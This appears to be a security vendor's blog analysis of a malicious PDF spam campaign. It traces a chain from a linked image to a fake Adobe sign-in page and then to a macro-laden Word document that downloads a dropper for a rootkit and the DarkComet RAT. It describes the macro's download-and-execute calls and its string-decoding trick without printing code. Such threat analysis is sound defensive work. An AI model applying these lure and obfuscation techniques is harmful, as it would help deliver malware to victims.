Jumping through the hoops: multi-stage malicious PDF spam

We've recently encountered a number of malicious spam messages with PDFs attached. The PDFs themselves are not malicious as they don't contain executable code, but they do contain images with underlying URI actions. The image, if clicked, will open the browser at the specified URL. What follows is an analysis of one of these samples.

Let's start with the email. We only saw a single instance of this message, which indicates to us that it was a low volume campaign. An analysis of the header trail showed the message originated from a real AOL webmail account.

The message included a PDF attachment, "PAYMENT RECEIPT.pdf," which didn't appear to embed any JavaScript or other malicious content. Opening the PDF reveals a blurred image with the suggestion that the document is secured and must be viewed online.

Underlying the image is a URI action that opens a browser and loads a URL.

The tinyurl redirects to the following web page:

Here we were presented with an alert:

Once we click OK, we're presented with a fake Adobe ID sign-in page.

The form duly accepted some gibberish we entered, which suggests that it's just part of the ruse and not actually harvesting credentials. Anyway, after convincing us we needed to view a secure PDF document online, we were now asked to download a Word Doc file!

Once we save the document and try to open it...what's that? Another blurred image and instructions to enable content:

So, in addition to bad English, the document contains a macro. We must be getting close now. Let's have a look at the macro which we extracted with oledump.py. As we might expect, the code is obfuscated, but with the use of URLDownloadToFileA and ShellExecute we can surmise that this code is downloading a file and executing it.

Essentially, when the document is opened this macro downloads a file to the temp directory and executes it. Line 36 shows a long string to be decrypted with the Decrypt function on line 49. The decrypt function first reverses the string, and then applies a simple -1 letter substitution cipher to the ASCII characters, so f becomes e and y becomes x and so on. This reveals the string:

Upon downloading that file, we had problems getting the sample to run in the lab. It complained about .Net, and then refused to run even after we installed .Net. However, a static analysis of the binary (MD5: 5bb68067ca34e94b875b3c56e3b31e48) revealed a layered, obfuscated .Net dropper that installs Kazy Rootkit and DarkComet RAT, a well-known Remote Access Trojan.

In summary, this type of email attack, where seemingly innocent PDFs contain clickable images that lead to a chain of other nastiness, appear to be on the increase. This is most likely because PDFs are ubiquitous and offer a way for attackers to bury their URLs to potentially bypass email gateway scanning. In this particular case, the use of an additional Word document was also puzzling, as it could have easily been used as the original email attachment. But, the manager of this campaign may be aware that email gateways are getting good at blocking macro-based Word malware, which has been extremely prevalent over the past year or so. Perhaps too, the attacker wanted to reuse their already-existing Word malware, and opted for advertising the location of the Word document via the link in the PDF. Even if the malware did run properly, we can't imagine this campaign being very successful for the attacker. It's multi-stage and interactive nature requires a tenacious victim indeed, with just the right software and options enabled. Most people would be suspicious well before the Word document stage.

We have protections in place in the Trustwave Secure Email Gateway for this and other similar campaigns that we have seen.